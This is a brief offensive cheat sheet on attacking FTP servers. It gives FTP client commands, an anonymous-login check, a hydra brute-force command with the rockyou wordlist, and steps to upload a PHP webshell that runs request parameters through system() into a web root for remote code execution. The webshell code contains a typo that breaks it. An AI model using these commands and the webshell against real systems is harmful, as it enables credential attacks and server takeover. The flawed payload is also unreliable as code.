Attacking FTP

Criteria

Login to FTP using the following command. You will be prompted to enter a username and password.

ftp {IP}

Download a file from FTP using the following command.

get creds.txt

There is also the option to download multiple files.

mget *

Upload a file from FTP using the following command.

put hello.txt

There is also the option to upload multiple files.

put *

To list files in FTP, use the following command.

dir

You can list hidden files with the following command.

dir -a

Attacks

Sometimes FTP servers may be misconfigured to allow for anonymous login.

ftp {IP}
>anonymous
>anonymous

Bruteforce FTP using the following command.

hydra -l root -P /usr/share/wordlists/rockyou.txt {IP} ftp

FTP to RCE

Description

If you have proper permissions, you may be able to upload a webshell via FTP and execute it on the website. This can be done by either having a disclosure of the website's path or by guessing.

Step 1 - Create a Webshell


    <?php 
        echo "Shelled";
        system(_$REQUEST['cmd']);
    ?>

Step 2 - Upload Webshell to Webroot via FTP

ftp> put shell.php C:\\xampp\\htdocs\\shell.php